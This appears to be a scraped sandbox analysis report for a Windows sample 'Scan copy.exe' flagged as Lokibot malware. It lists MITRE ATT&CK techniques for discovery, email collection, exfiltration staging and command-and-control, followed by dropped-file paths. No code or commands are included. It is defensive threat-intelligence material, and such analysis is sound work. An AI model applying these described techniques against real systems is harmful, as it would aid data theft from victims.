Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Scan copy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan copy.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vLQwEscoQr.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edpjkv0s.byg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izrjuvqt.fxq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbeav2kw.en0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvs0x32b.g4m.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_leqhu13t.jl5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsehfu4i.4e5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsu1xqxl.ovu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueocvtkj.lke.psm1

C:\Users\user\AppData\Local\Temp\tmp18EC.tmp

Windows Analysis Report
Scan copy.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre